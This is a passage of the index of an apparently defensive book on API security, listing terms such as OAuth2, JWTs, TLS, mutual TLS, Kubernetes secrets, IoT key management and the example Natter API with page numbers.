enctype attribute 55
Endorsement Key (EK) 481
endpoints, OAuth2 229–230
end-to-end authentication 496–510
avoiding replay in REST APIs 506–510
OSCORE 499–506
deriving context 500–503
encrypting message 504–506
generating nonces 503–504
end-to-end security 467–478
alternatives to COSE 472–474
COSE 468–472
MRAE 475–478
enforcePolicy method 288
Enterprise Java Beans (EJBs) 7
entity authentication 497
Entity Tag (ETag) header 507
entropy 157
ENTRYPOINT command 342
EnumSet class 92
envelope encryption 421
environments 16–18
epk header 257
request.pathInfo() method 307
ES256 algorithm 391
establish secure defaults principle 74
ETag (Entity Tag) header 507
eTLDs (effective top-level domains) 128
EtM (Encrypt-then-MAC) 197
eval() function 40
evaluation version, of ForgeRock Access
Management 526–531
exfiltration 167
exp claim 187, 191, 394
exp field 242
expired_token 516
Expires attribute 122
Expires header 58
eXtensible Access-Control Markup Language
(XACML) 290–291
external additional authenticated data 504
extract method 472, 501
extract-and-expand method 426
F
fault attack 477
federation protocol 72
fetchLinkPreview method 359
file descriptors 295
file exposure 420
findMessages method 310, 326
findOptional method 491
fingerprint 411
FINISHED status 447
firewalls 10
first-party caveats 321, 325–328
first-party clients 111
followRedirects(false) method 365
ForgeRock Access Management 525–531
running evaluation version 526–531
setting up host alias 526
ForgeRock Directory Services 531
form submission, intercepting 104
forward secrecy 246
PSK with 465–467
ratcheting for 482–484
freshness 497
FROM command 341–342
- -from-file 416
future secrecy 484
G
GCM (Galois Counter Mode) 197, 201, 453
GDPR (General Data Protection Regulation) 4,
224
GeneralCaveatVerifier interface 326
generic secrets 416
getCookie function 142, 166
getDelegatedTask() method 447
getEncoded() method 460, 502
getHint() method 494
getIdentityManager() method 494
getItem(key) method 165
getrandom() method 157
getSecurityParametersConnection() method
495
getSecurityParametersHandshake() method
495
getSupportedCipherSuites() method 464
getSupportedVersions() method 460, 462
GIDs (group IDs) 343, 350
GRANT command 46, 277
grants
client credentials grant 385–388
JWT bearer grant for OAuth2 389–396
client authentication 391–393
generating 393–395
service account authentication
395–396
grant_type parameter 233, 432, 515
-groupname secp256r1 argument 391
groupOfNames class 272
groupOfUniqueNames class 272
groupOfURLs class 272
groups 268–273
Guava, rate-limiting with 66
H
H2 database
building as Docker container 341–345
deploying to Kubernetes 345–349
halt() method 151
handshake 245, 397
hardening
capability URIs 315–318
code exchange with PKCE 236–237
database token storage 170–180
authenticating tokens with HMAC 172–177
hashing database tokens 170–171
protecting sensitive attributes 177–180
OIDC 263–264
hardware security module (HSM) 422, 480–481
Hash field 407
hash function 130
hash-based double-submit cookies 129–133
hash-based key derivation function (HKDF) 425,
469
hashing database tokens 170–171
hash.substring(1) method 312
HATEOAS (Hypertext as Engine of Application
State) 308–311
headers
encoding with end-to-end security 509–510
JOSE 188–190
algorithm header 188–189
specifying key in header 189–190
headless JWTs 188
HKDF (hash-based key derivation function) 425,
469
HKDF_Context_PartyU_nonce attribute 470
HKDF-Expand method 426
HKDF.expand() method 501
HKDF-Extract method 425, 501
HMAC (hash-based MAC)
authenticating tokens with 172–177
generating key 176–177
trying it out 177
protecting JSON tokens with 183
HmacKeyStore 177
HMAC-SHA256 algorithm 172
HmacTokenStore 173, 176, 183–184, 191–193,
197–198, 206, 208, 211, 304, 319, 323
holder-of-key tokens 410
host alias 526
host name 147
__Host prefix 123, 130
host-only cookie 121
HS256 algorithm 191
HSM (hardware security module) 422, 480–481
HSTS (HTTP Strict-Transport-Security) 82
HTML 105–108
HTTP Basic authentication
drawbacks of 108
preventing spoofing with 71
HTTP OPTIONS request 148
HTTP Strict-Transport-Security (HSTS) 82
HttpClient class 247, 444
HttpOnly attribute 121
HTTPS 9
enabling 80–81
securing client configuration 245–247
hybrid tokens 210–213
Hypertext as Engine of Application State
(HATEOAS) 308–311
I
iat claim 187
IBAC (identity-based access control) 267–293
attribute-based access control (ABAC) 282–293
best practices for 291
combining decisions 284
distributed policy enforcement and
XACML 290–291
implementing decisions 285–288
policy agents and API gateways 289–290
role-based access control (RBAC) 274–281
determining user roles 279–280
dynamic roles 280–281
mapping roles to permissions 276–277
static roles 277–278
users and groups 268–273
ID tokens 260–262, 264–266
idempotent operations 506
identification 21–22
identity
combining capabilities with 314–315
verifying client identity 402–406
identity-based access control 22
idle timeouts 211
IDS (intrusion detection system) 10
IIoT (industrial IoT) 440
IllegalArgumentException 51
image property 354
img tag 167
impersonation 431
implicit grant 228
implicit nonces 453
import statement 287
in transit encryption 20
inactivity logout 211
indistinguishability 15
industrial IoT (IIoT) 440
Inet6Address class 363
InetAddress.getAllByName() method 363
information disclosure 18
InfoSec (Information security) 8
ingress controller 375, 377–378
init container 338
InitialDirContext 272
initialization vector (IV) 201, 475
injection attacks 39–47
mitigating SQL injection with permissions
45–47
preventing 43–45
.innerHTML attribute 169
input validation 47–51
InputStream argument 421
insecure deserialization vulnerability 48
- -insecure option 81
INSERT statement 41–42, 46
insert() method 286
insufficient_scope 221
int value 61
integrity 14
intermediate CAs 246, 369–370
Introspection endpoint 529
intrusion detection system (IDS) 10
intrusion prevention system (IPS) 10
invalid curve attacks 455
IoT (Internet of Things) 4, 65
IoT (Internet of Things) APIs 488–522
authenticating devices 489–496
device certificates 492
identifying devices 489–492
with TLS connection 492–496
end-to-end authentication 496–510
avoiding replay in REST APIs 506–510
Object Security for Constrained RESTful Environments (OSCORE) 499–506
OAuth2 for constrained environments 511–517
offline access control 518–521
offline authorization 520–521
offline user authentication 518–520
IoT (Internet of Things) communications
439–487
end-to-end security 467–478
alternatives to COSE 472–474
COSE 468–472
misuse-resistant authenticated encryption
(MRAE) 475–478
key distribution and management 479–486
key distribution servers 481–482
one-off key provisioning 480–481
post-compromise security 484–486
ratcheting for forward secrecy 482–484
pre-shared keys (PSK) 458–467
clients 462–463
implementing servers 460–461
supporting raw PSK cipher suites 463–464
with forward secrecy 465–467
transport layer security (TLS) 440–457
cipher suites for constrained devices
452–457
Datagram TLS 441–452
IPS (intrusion prevention system) 10
isAfter method 326
isBlockedAddress 364
isInboundDone() method 450
isMemberOf attribute 273
iss claim 187, 253, 393, 395
Istio Gateway 408
IV (initialization vector) 201, 475
ivLength argument 502
J
Java 523–531
installing
Authorization Server 525–531
Docker 525
LDAP directory server 531
setting up 523–525
Linux 525
macOS 523–524
Windows 525
Java EE (Java Enterprise Edition) 10
java -version command 524
java.net.InetAddress class 363
java.net.URI class 303
JavaScript
calling login API from 140–142
calling Natter API from 102–104
java.security package 133
java.security.cert.X509Certificate object 402
java.security.egd property 350
java.security.MessageDigest class 411
java.security.SecureRandom 201
javax.crypto.Mac class 174, 320
javax.crypto.SecretKey class 205
javax.crypto.spec.SecretKeySpec class 426
javax.net.ssl.TrustManager 246
JdbcConnectionPool object 33
jku header 190
JOSE (JSON Object Signing and Encryption)
header 188–190
algorithm header 188–189
specifying key in header 189–190
jq utility 327
JSESSIONID cookie 141
JSON Web Algorithms (JWA) 185
JSON Web Encryption (JWE) 185
JSON Web Key (JWK) 185, 189
JSON Web Signatures (JWS) 185, 469
JSONException 51
JsonTokenStore 183, 187, 192, 198, 200, 203, 206,
208–209, 322
jti claim 187, 394
JWA (JSON Web Algorithms) 185
JWE (JSON Web Encryption) 185
JWEHeader object 203
JWK (JSON Web Key) 185, 189
jwk header 190
JWK Set URI 529
JWKSet.load method 392
jwks_uri field 252
JWS (JSON Web Signatures) 185, 469
JWS Compact Serialization 185
JWSAlgorithm object 191
JWSSigner object 191
JWSVerifier object 191, 193
JWT bearer authentication 384–385
JWT ID (jti) claim 211
JwtBearerClient class 391
JWTClaimsSet.Builder class 203
JWTs (JSON Web Tokens) 185–194, 389
bearer grant for OAuth2 396
client authentication 391–393
generating 393–395
service account authentication 395–396
encrypted 200–202, 256
generating standard 190–193
JOSE header 188–190
algorithm header 188–189
specifying key in header 189–190
standard claims 187–188
using library 203–205
validating access tokens 249–256
choosing signature algorithm 254–256
retrieving public key 254
validating signed 193–194
K
-k option 81
KDF (key derivation function) 425
KEK (key encryption key) 421
Kerckhoff’s Principle 195
key derivation function (KDF) 425
key distribution and management 479–486
derivation 425–428
generating for HMAC 176–177
key distribution servers 481–482
managing service credentials 420–422
one-off key provisioning 480–481
post-compromise security 484–486
ratcheting for forward secrecy 482–484
retrieving public keys 251–254
specifying in JOSE header 189–190
key distribution servers 481–482
key encryption key (KEK) 421
key hierarchy 421
Key ID (KID) header 504
key management 415
Key object 174, 460
key rotation 189–190
key-driven cryptographic agility 189
KeyManager 443
KeyManagerFactory 450
keys 22
keys attribute 251
keys field 393
KeyStore object 246, 421
keytool command 199, 391
KID (Key ID) header 504
kid header 190, 428
KieServices.get().getKieClasspathContainer()
method 286
kit-of-parts design 186
KRACK attacks 475
kty attribute 189
kubectl apply command 346, 377
kubectl command-line application 533
kubectl create secret docker-registry 416
kubectl create secret tls 416
kubectl describe pod 417
kubectl get namespaces command 346
kubectl version - -client - -short command 533
Kubernetes
deploying Natter on 339–368
building H2 database as Docker
container 341–345
calling link-preview microservice 357–360
deploying database to Kubernetes
345–349
deploying new microservice 355–357
DNS rebinding attacks 366–368
link-preview microservice 353–354
preventing server-side request forgery
(SSRF) attacks 361–365
microservice APIs on 336
secrets 380, 415–420
securing incoming requests 381
securing microservice communications
368–377
locking down network connections
375–377
securing communications with TLS
368–369
using service mesh for TLS 370–374
setting up 532–534
Linux 533–534
MacOS 532–533
Windows 534
L
LANGSEC movement 48
lateral movement 375
layer-7 (Application-layer DoS attacks) 65
LDAP (Lightweight Directory Access Protocol) 72,
271
groups 271–273
installing directory server 531
Linkerd 372–374
linkerd annotation 372
linkerd check - -pre command 372
linkerd check command 372
link-local IP address 363
link-preview microservice 353–354, 357–360
LinkPreviewer class 367
links field 358
Linux
setting up Java and Maven on 525
setting up Kubernetes 533–534
Minikube 534
VirtualBox 534
List objects 403
list_files scope 224
load balancer 10
load event 104
load() method 421
localStorage object 164
login
building UI for Natter API 138–142
implementing token-based 112–115
login(username, password) function 140
logout 143–145
long-lived secrets 423–425
lookupPermissions method 279, 306, 316
loopback address 363
M
MAC (mandatory access control) 223, 267
MAC (message authentication code) 172, 456,
496, 504
macaroons 319–330
contextual caveats 321
first-party caveats 325–328
macaroon token store 322–324
third-party caveats 328–330
answers to exercises 330
creating 329–330
MacaroonsBuilder class 326, 329
MacaroonsBuilder.create() method 322
macaroon.serialize() method 322
MacaroonsVerifier 323
MacaroonTokenStore 324
macKey 192, 324
macKey.getEncoded() method 322
macOS
setting up Java and Maven 523–524
setting up Kubernetes 532–533
Minikube 533
VirtualBox 532–533
MACSigner class 192
MACVerifier class 192–193
MFA (multi-factor authentication) 22
Main class 30, 34, 46, 51, 54, 75–76, 200, 318, 418
main() method 46, 59, 93, 280, 288, 318, 394–395,
418, 493–494
mandatory access control (MAC) 223, 267
man-in-the-middle (MitM) attack 485
marker interfaces 207
Maven 523, 531
installing
Authorization Server 525–531
Docker 525
LDAP directory server 531
setting up
Linux 525
macOS 523–524
Windows 525
max-age attribute 82, 122
max_time parameter 262
member attribute 272
member role 278
- -memory flag 344
message authentication 497
message authentication code (MAC) 172, 456,
496, 504
Message class 358
MessageDigest class 133
MessageDigest.equals 180
MessageDigest.isEqual method 134–135, 175, 413
messages table 32
microservice APIs in Kubernetes 335–382
deploying Natter on Kubernetes 339–368
building H2 database as Docker
container 341–345
building Natter API as Docker
container 349–353
calling link-preview microservice 357–360
deploying database to Kubernetes 345–349
deploying new microservice 355–357
DNS rebinding attacks 366–368
link-preview microservice 353–354
preventing server-side request forgery (SSRF)
attacks 361–365
securing incoming requests 377–381
securing microservice communications 368–377
locking down network connections 375–377
securing communications with TLS 368–369
using service mesh for TLS 370–374
microservices 3, 335
microservices architecture 8
Minikube
Linux 534
MacOS 533
Windows 534
minikube config set vm-driver virtualbox
command 533
minikube ip command 345, 360, 368
misuse-resistant authenticated encryption
(MRAE) 475–478
MitM (man-in-the-middle) attack 485
mkcert utility 80–81, 246, 379, 400, 402, 406, 451
mode of operation, block cipher 196
model-view-controller (MVC) 34
modern token-based authentication 146–180
allowing cross-domain requests with CORS
147–154
adding CORS headers to Natter API
151–154
CORS headers 150–151
preflight requests 148
hardening database token storage 170–180
authenticating tokens with HMAC 172–177
hashing database tokens 170–171
protecting sensitive attributes 177–180
tokens without cookies 154–169
Bearer authentication scheme 160–162
deleting expired tokens 162–163
storing token state in database 155–160
storing tokens in Web Storage 163–166
updating CORS filter 166
XSS attacks on Web Storage 167–169
monotonically increasing counters 497
MRAE (misuse-resistant authenticated
encryption) 475–478
mTLS (mutual TLS) 374, 396–414
certificate-bound access tokens 410–414
client certificate authentication 399–401
using service mesh 406–409
verifying client identity 402–406
with OAuth2 409–410
multicast delivery 441
multi-factor authentication (MFA) 22
multistage build, Docker 342
MVC (model-view-controller) 34
mvn clean compile exec:java command 38
N
-n option 415
NaCl (Networking and Cryptography
Library) 198–200, 473
name constraints 370
namespace 345
Natter API 27–33, 62–97
access control 87–97
access control lists (ACLs) 90–92
adding new members to Natter space 94–95
avoiding privilege escalation attacks 95–97
enforcing 92–94
enforcing authentication 89
adding CORS headers to 151–154
adding scoped tokens to 220–222
addressing threats with security controls
63–64
audit logging for accountability 82–87
authentication to prevent spoofing 70–77
authenticating users 75–77
creating password database 72–74
HTTP Basic authentication 71
registering users in Natter API 74–75
secure password storage with Scrypt 72
building login UI 138–142
calling from JavaScript 102–104
deploying on Kubernetes 339–368
building H2 database as Docker
container 341–345
building Natter API as Docker
container 349–353
calling link-preview microservice 357–360
deploying database to Kubernetes 345–349
deploying new microservice 355–357
DNS rebinding attacks 366–368
link-preview microservice 353–354
preventing server-side request forgery (SSRF)
attacks 361–365
double-submit cookies for 133–138
encrypting private data 78–82
enabling HTTPS 80–81
strict transport security 82
implementation 29
initializing database 32–33
overview 28–29
rate-limiting for availability 64–69
setting up project 30–31
using capability URIs in 303–307
returning capability URIs 305–306
validating capabilities 306–307
natter-api namespace 345, 375, 380, 401
natter-api-service 367
natter-api-service.natter-api 367
natter_api_user permissions 73, 84
natter-tls namespace 380
nbf claim 187
NEED_TASK 447
NEED_UNWRAP 446
NEED_UNWRAP_AGAIN 447
NEED_WRAP 447
network connections, locking down 375–377
network policies, Kubernetes 375
Network security 8
network segmentation 368
Networking and Cryptography Library
(NaCl) 198–200, 473
network-level DoS attack 64
nextBytes() method 158
NFRs (non-functional requirements) 14
nginx.ingress.kubernetes.io/auth-tls-error-page 400
nginx.ingress.kubernetes.io/auth-tls-pass-certificate-to-upstream 400
nginx.ingress.kubernetes.io/auth-tls-secret 400
nginx.ingress.kubernetes.io/auth-tls-verify-client 400
nginx.ingress.kubernetes.io/auth-tls-verify-depth 400
nodePort attribute 352
nodes, Kubernetes 337
nonce (number-used-once) 201, 262–263, 497
nonce() method 504
nonces 503–504
non-functional requirements (NFRs) 14
non-repudiation 14
NOT_HANDSHAKING 447
number-used-once (nonce) 201, 262–263, 497
O
OAEP (Optimal Asymmetric Encryption
Padding) 257
OAuth2 217–266
ACE-OAuth (Authorization for Constrained
Environments using OAuth2) 511–517
authorization code grant 230–238
hardening code exchange with Proof
Key for Code Exchange (PKCE)
236–237
redirect URIs for different types of
client 235–236
refresh tokens 237–238
client credentials grant 385–388
introducing 226–230
authorization grants 228–229
discovering OAuth2 endpoints 229–230
types of clients 227–228
JWT bearer grant for 389–396
client authentication 391–393
generating 393–395
service account authentication 395
mutual TLS (mTLS) with 409–410
OpenID Connect (OIDC) 260–266
hardening 263–264
ID tokens 260–262
passing ID tokens to APIs 264–266
scoped tokens 218–224
adding to Natter 220–222
difference between scopes and
permissions 223–224
single sign-on (SSO) 258–259
token exchange 431–435
validating access tokens 239–258
encrypted JWT 256
JWTs 249–256
letting AS decrypt tokens 258
securing HTTPS client configuration 245–247
token introspection 239–244
token revocation 248
OAuth2TokenStore 243, 248
Object array 272
object-oriented (OO) 296
ocaps (object-capability-based security) 296
OCSP (online certificate status protocol) 369
off-heap memory 483
offline access control 518–521
offline authorization 520–521
offline user authentication 518–520
OIDC (OpenID Connect) 185, 260–266, 497
hardening 263–264
ID tokens 260–262
passing ID tokens to APIs 264–266
onboarding 489
one-off key provisioning 480–481
online certificate status protocol (OCSP) 369
OO (object-oriented) 296
OP (OpenID Provider) 260–261
OPA (Open Policy Agent) 289
open redirect vulnerability 232, 364–365
OpenID Provider (OP) 260–261
Optimal Asymmetric Encryption Padding
(OAEP) 257
Optional class 112
Optional.empty() method 117
optional_no_ca option 414
OR operator 135
ORM (object-relational mapper) 45
OSCORE (Object Security for Constrained
RESTful Environments) 499–506
deriving context 500–503
encrypting message 504–506
generating nonces 503–504
Oscore class 502, 504
output
exploiting XSS Attacks 54–57
implementing protections 58–61
preventing XSS 57–58
producing safe 53–61
OWASP (Open Web Application Security
Project) 39
OWL (Web Ontology Language) 281
owner field 77
owner role 278
P
package statement 287
padding oracle attack 202
PAP (Policy Administration Point) 290
PartyU 470
PASETO 186
password hashing algorithm 72
passwords
creating database for 72–74
storage with Scrypt 72
Path attribute 121
path traversal 420
path traversal vulnerability 484
PDP (Policy Decision Point) 290
PEM (Privacy Enhanced Mail) 80
PEP (Policy Enforcement Point) 290
perfect forward secrecy 453
permissions 90
difference between scopes and 223–224
mapping roles to 276–277
mitigating SQL injection attacks with 45–47
permissions table 90, 269, 271, 277–278
permit() method 284, 286
perms attribute 307
persistent cookie 122
personally identifiable information (PII) 24
phantom token pattern 429–431
PII (personally identifiable information) 24
PIP (Policy Information Point) 290
PKCE (Proof Key for Code Exchange) 236–237
PKI (public key infrastructure) 369, 409, 479
pods 337
podSelector 375
POLA (principle of least authority) 45–46, 90,
250, 295
Policy Administration Point (PAP) 290
policy agents 289–290
Policy Decision Point (PDP) 290
Policy Enforcement Point (PEP) 290
Policy Information Point (PIP) 290
policy sets 290
PoP (proof-of-possession) tokens 410, 517
post-compromise security 484–486
postMessage operation 280
- -pre argument 372
preflight requests 148
prepared statements 43–44
pre-shared keys 455
.preventDefault() method 104
PRF (pseudorandom function) 475
principle of defense in depth 66
principle of least authority (POLA) 45–46, 90,
250, 295
principle of least privilege 46
principle of separation of duties 84
Privacy Enhanced Mail (PEM) 80
private-use IP address 363
privilege escalation attacks 95–97
privilege separation 341
processResponse method 242, 413
prompt=login parameter 262
prompt=none parameter 262
Proof Key for Code Exchange (PKCE) 236–237
property attribute 354
PROTECTED header 470
pseudorandom function 425
PSK (pre-shared keys) 458–463, 467, 490, 492
clients 462–463
implementing servers 460–461
supporting raw PSK cipher suites 464
with forward secrecy 465–467
PskClient 494
pskId variable 494
PskServer 493
PSKTlsClient 462, 464
PSKTlsServer class 460, 495
public clients 227
public key encryption algorithms 195
public key infrastructure (PKI) 369, 409, 479
public keys 251–254
public suffix list 128
pw_hash column 73
Q
query language 8
QueryBuilder class 270
QUIC protocol (Quick UDP Internet
Connections) 442
quotas 24
R
rainbow table 75
random number generator (RNG) 157
ratcheting 482–484
RateLimiter class 67
rate-limiting 19, 24–26
answers to pop quiz questions 25–26
for availability 64–69
raw PSK cipher suites 463–464
raw public keys 455
RBAC (role-based access control) 274–281
determining user roles 279–280
dynamic roles 280–281
mapping roles to permissions 276–277
static roles 277–278
RCE (remote code execution) 48
read() method 194, 213, 252, 254, 325–326
readMessage method 359
read-only memory (ROM) 480
readOnlyRootFileSystem 347
realms 277
receive() method 446
Recipient Context 499
Recipient object 470
recvBuf 446
redirect URIs 235–236
redirect_uri parameter 234
ReDoS (regular expression denial of service)
attack 51
Referer header 78, 233, 263, 301–302, 311,
314
Referrer-Policy header 301
reflected XSS 53–54
reflection attacks 188, 471
refresh tokens 237–238
registerable domain 127
registering users in Natter API 74–75
regular expression denial of service (ReDoS)
attack 51
Relying Party (RP) 260–261
remote attestation 481
remote code execution (RCE) 48
Remote Method Invocation (RMI) 7
Remote Procedure Call (RPC) 7
RemoteJWKSet class 252–253
removeItem(key) method 165
replay 506–510
replay attacks 187–188, 496, 498
repudiation 18
request object 34, 509
requested_token_type parameter 432
request.session() method 116
request.session(false) method 120
request.session(true) method 119–120
requireAuthentication method 92, 138, 162
requirePermission method 270, 276, 279, 283
requireRole filter 276
requireScope method 221
resource owner (RO) 227
Resource Owner Password Credentials (ROPC)
grant 228
resource parameter 432
resource server (RS) 227
resources 14, 282
Response object 34
response_type parameter 231
response_type=device_code parameter 516
REST (REpresentational State Transfer) 8
REST APIs 34–35
avoiding replay in 506–510
capability-based security and 297–302, 318
capabilities as URIs 299
capability URIs for browser-based clients
311–312
combining capabilities with identity
314–315
hardening capability URIs 315–318
Hypertext as Engine of Application State
(HATEOAS) 308–311
using capability URIs in Natter API 303–307
creating new space 34–35
wiring up endpoints 36–39
Retry-After header 67, 96
reverse proxy 10
Revocation endpoint 529
REVOKE command 46
revoke method 182, 203, 239, 248
revoking tokens 209–213
access tokens 248
implementing hybrid tokens 210–213
RMI (Remote Method Invocation) 7
RNG (random number generator) 157
RO (resource owner) 227
role_permissions table 277, 279
@RolesAllowed annotation 276
ROM (read-only memory) 480
root CA 369, 397
ROPC (Resource Owner Password Credentials)
grant 228
routes 36
row-level security policies 179
RowMapper method 85
RP (Relying Party) 260–261
RPC (Remote Procedure Call) 7
RS (resource server) 227
RSA1_5 algorithm 257
RSA-OAEP algorithm 257
RSA-OAEP-256 algorithm 257
RtlGenRandom() method 157
runAsNonRoot 346
rwd (read-write-delete) permissions 309
S
salt 75
same-origin policy (SOP) 54, 105–106, 147
SameSite attribute 121
SameSite cookies 127–129, 152
SameSite=lax 129
SameSite=strict 129
sandboxing 347
satisfyExact method 325
Saver API 297
scope claim 254
scope field 242
scope parameter 432, 514
scoped tokens 218–224
adding to Natter 220–222
difference between scopes and
permissions 223–224
scopes 219
Scrypt 72
search method 272
secret key cryptography 195
SecretBox class 198–200, 490
SecretBox.encrypt() method 198
SecretBox.key() method 200
secretName 380
secrets management services 420–422
Secure attribute 121
secure element chip 477
__Secure prefix 123
Secure Production Identity Framework for Everyone (SPIFFE) 407–408
Secure Socket Layer (SSL) 79
secure() method 81, 350, 392
SecureRandom class 157–158, 160, 180, 236, 329,
350, 443
SecureTokenStore interface 207–209, 323
security areas 8–12
security domain 277
security goals 14–16
Security Information and Event Management
(SIEM) 83
security mechanisms 19–26
access control and authorization 22–23
audit logging 23–24
encryption 20
identification and authentication 21–22
rate-limiting 24–26
security token service (STS) 432
securityContext 346
SecurityParameters class 495
SELECT statement 46
selectFirst method 354
selectors 346
self-contained tokens 181–214
encrypting sensitive attributes 195–205
authenticated encryption 197
authenticated encryption with NaCl 198–200
encrypted JWTs 200–202
using JWT library 203–205
handling token revocation 209–213
JWTs 185–194
generating standard 190–193
JOSE header 188–190
standard claims 187–188
validating signed 193–194
storing token state on client 182–183
using types for secure API design 206–209
self-signed certificate 80
Sender Context 499
sensitive attributes
encrypting 195–205
authenticated encryption 197
authenticated encryption with NaCl 198–200
encrypted JWTs 200–202
using JWT library 203–205
protecting 177–180
separation of duties 84
Serializable framework 48
serialize() method 191, 203
servers
implementing DTLS 450–452
implementing PSK for 460–461
server-side request forgery (SSRF) attacks 190,
361–365
service accounts
authenticating using JWT bearer grant 395–396
client credentials grant 387–388
service API calls 428–435
OAuth2 token exchange 431–435
phantom token pattern 429–431
service mesh
for TLS 370–374
mutual TLS (mTLS) 406–409
services, Kubernetes 338–339
service-to-service APIs 383–436
API keys and JWT bearer authentication
384–385
JWT bearer grant for OAuth2 389–396
client authentication 391–393
generating JWTs 393–395
service account authentication 395–396
managing service credentials 415–428
avoiding long-lived secrets on disk 423–425
key and secret management services 420–422
key derivation 425–428
Kubernetes secrets 415–420
mutual TLS authentication 396–414
certificate-bound access tokens 410–414
client certificate authentication 399–401
how TLS certificate authentication
works 397–398
mutual TLS with OAuth2 409–410
using service mesh 406–409
verifying client identity 402–406
OAuth2 client credentials grant 385–388
service API calls in response to user
requests 428–435
OAuth2 token exchange 431–435
phantom token pattern 429–431
session cookie authentication 101–145
building Natter login UI 138–142
implementing logout 143–145
in web browsers 102–108
calling Natter API from JavaScript 102–104
drawbacks of HTTP authentication 108
intercepting form submission 104
serving HTML from same origin 105–108
preventing Cross-Site Request Forgery
attacks 125–138
double-submit cookies for Natter API
133–138
hash-based double-submit cookies 129–133
SameSite cookies 127–129
session cookies 115–125
avoiding session fixation attacks 119–120
cookie security attributes 121–123
validating 123–125
token-based authentication 109–115
implementing token-based login 112–115
token store abstraction 111–112
session cookies 115–125
avoiding session fixation attacks 119–120
cookie security attributes 121–123
validating 123–125
session fixation attacks 119–120
session.fireAllRules() method 286
session.invalidate() method 143
sessionStorage object 164
Set-Cookie header 115
setItem(key, value) method 165
setSSLParameters() method 456
setUseClientMode(true) method 444
SHA-256 hash function 133
sha256() method 171
side channels 477
sidecar container 338
SIEM (Security Information and Event
Management) 83
signature algorithms 254–256
Signature object 421
SignedJwtAccessToken 265
SignedJwtAccessTokenStore 252
SignedJwtTokenStore 192, 208
single logout 260
single sign-on (SSO) 258–259
single-page apps (SPAs) 54, 312
site-local IPv6 addresses 363
SIV (Synthetic Initialization Vector) mode 475
SIV-AES 475
slow_down 516
smart TVs 512
SOP (same-origin policy) 54, 105–106, 147
SpaceController class 34, 36–37, 75, 94, 278, 304
spaceId 41
space_id field 277
:spaceId parameter 92
spaces 34–35
spaces database 35
spaces table 32, 90
Spark route 36
Spark.exception() method 51
SPAs (single-page apps) 54, 312
SPIFFE (Secure Production Identity Framework
for Everyone) 407–408
sponge construction 473
spoofing prevention 70–77
authenticating users 75–77
creating password database 72–74
HTTP Basic authentication 71
registering users in Natter API 74–75
secure password storage with Scrypt 72
SQLi (SQL injection) attacks 40, 45–47, 270
src attribute 167
SSL (Secure Socket Layer) 79
SSL offloading 10
SSL passthrough 379
SSL re-encryption 10
SSL termination 10
ssl-client-cert header 400, 402, 404, 413
ssl-client-issuer-dn header 402
ssl-client-subject-dn header 402
ssl-client-verify header 402, 404, 413
SSLContext 444, 450
SSLContext.init() method 443
SSLEngine class 443–444, 456–457, 461
sslEngine.beginHandshake() method 446
sslEngine.getHandshakeStatus() method 446
SSLEngine.unwrap() method 447
sslEngine.unwrap(recvBuf, appData) 446
sslEngine.wrap(appData, sendBuf) 445
SSLParameters 456
SSLSocket class 443–444
SSO (single sign-on) 258–259
SSRF (server-side request forgery) attacks 190,
361–365
state parameter 232, 263
stateless interactions 115
static groups 272
static roles 277–278
staticFiles directive 106
sticky load balancing 505–506
Storage interface 165
strict transport security 82
STRIDE (spoofing, tampering, repudiation, information disclosure, denial of service, elevation of privilege) 18
String equals method 134
STROBE framework 473
STS (security token service) 432
styles, API security 7–8
sub claim 187, 191, 393, 395
sub field 242
sub-domain hijacking 122
sub-domain takeover 122
subject attribute 123, 282
Subject field 407
subject_token_type parameter 432
.svc.cluster.local filter 367
Synthetic Initialization Vector (SIV) mode 475
System.getenv(String name) method 417
T
tampering 18
tap utility 373
targetPort attribute 348
TCP (Transmission Control Protocol) 441
TEE (Trusted Execution Environment) 482
temporary tables 270
test client 388
third-party caveats 328–330
answers to exercises 330
creating 329–330
third-party clients 111
threat models 16–18
threats 17, 63–64
throttling 24–25
thumbprint method 411
timeOfDay attribute 288
TimestampCaveatVerifier 325
timing attacks 134
TLS (Transport Layer Security) 9, 79, 440–457
authenticating devices with 492–496
cipher suites for constrained devices 452–457
Datagram TLS (DTLS) 441–452
implementing for client 443–450
implementing for server 450–452
mutual TLS (mTLS) authentication 396–414
certificate-bound access tokens 410–414
client certificate authentication 399–401
using service mesh 406–409
verifying client identity 402–406
with OAuth2 409–410
securing communications with 368–369
using service mesh for 370–374
TLS cipher suite 245
TLS secret 416
TlsContext class 495
TLS_DHE_PSK_WITH_AES_128_CCM cipher suite 466
TLS_DHE_PSK_WITH_AES_256_CCM cipher suite 466
TLS_DHE_PSK_WITH_CHACHA20_POLY1305_SHA256 cipher suite 466
TLS_ECDHE_PSK_WITH_AES_128_CCM_SHA256 cipher suite 466
TLS_ECDHE_PSK_WITH_CHACHA20_POLY1305_SHA256 cipher suite 466
TLS_EMPTY_RENEGOTIATION_INFO_SCSV marker cipher suite 456
TlsPSKIdentityManager 460
TLS_PSK_WITH_AES_128_CCM cipher suite 464
TLS_PSK_WITH_AES_128_CCM_8 cipher suite 464
TLS_PSK_WITH_AES_128_GCM_SHA256 cipher suite 464
TLS_PSK_WITH_AES_256_CCM cipher suite 464
TLS_PSK_WITH_AES_256_CCM_8 cipher suite 464
TLS_PSK_WITH_AES_256_GCM_SHA384 cipher suite 464
TLS_PSK_WITH_CHACHA20_POLY1305_SHA256 cipher suite 464
Token class 111–112
Token endpoint 529
token exchange 431–435
token introspection 239–244
Token object 117
token parameter 241
token revocation 143
token store abstraction 111–112
token-based authentication 109–115
implementing token-based login 112–115
modern 146–180
allowing cross-domain requests with CORS 147–154
hardening database token storage 170–180
tokens without cookies 154–169
token store abstraction 111–112
TokenController class 177, 194, 200, 209, 315
TokenController interface 113–115, 118, 136
TokenController validateToken() method 124
tokenController.requireScope method 222
TokenController.validateToken method 317
tokenId argument 124, 134
tokenId parameter 136
tokens 102
access tokens 239–258
ID tokens 260–262, 264–266
macaroons 319–330
contextual caveats 321
first-party caveats 325–328
macaroon token store 322–324
third-party caveats 328–330
refresh tokens 237–238
scoped tokens 218–224
adding to Natter 220–222
difference between scopes and permissions 223–224
self-contained tokens 181–214
encrypting sensitive attributes 195–205
handling token revocation 209–213
JWTs 185–194
storing token state on client 182–183
using types for secure API design 206–209
without cookies 154–169
Bearer authentication scheme 160–162
deleting expired tokens 162–163
storing token state in database 155–160
storing tokens in Web Storage 163–166
updating CORS filter 166
XSS attacks on Web Storage 167–169
tokens table 158, 305
TokenStore interface 111–113, 115, 118, 124, 143–144, 207–208, 243, 303, 322
tokenStore variable 315
token_type_hint parameter 241
toPublicJWKSet method 392
Transmission Control Protocol (TCP) 441
